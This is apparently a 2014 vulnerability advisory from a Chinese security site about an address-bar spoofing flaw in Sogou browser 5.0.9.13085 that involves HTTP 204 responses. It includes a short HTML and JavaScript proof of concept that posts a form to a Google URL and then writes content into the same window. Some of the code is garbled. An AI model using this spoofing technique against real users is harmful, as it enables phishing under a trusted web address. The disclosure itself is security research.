Sogou browser 5. 0. 9. 13085HTTP204 fake website vulnerability-vulnerability warning-the black bar safety net

2014-09-25T00:00:00
ID MYHACK58:62201454004
Type myhack58
Reporter 佚名
Modified 2014-09-25T00:00:00

Description

Brief description:

Sogou browser 5. 0. 9. 13085HTTP204 fake website vulnerability

Detailed description:

! [](/Article/UploadPic/2014-9/20149258574068363.jpg)

Vulnerability proof:

<form action="https://www.google.com/csi" target="xx" method="post" onsubmit="setTimeout('d()', 1 1);" id="c">

<input type="submit">a</input>

</form>

the <script>

function d(){ var k = window. open("java script:document. write(4)", "xx");

}

</script>

[1] [2] next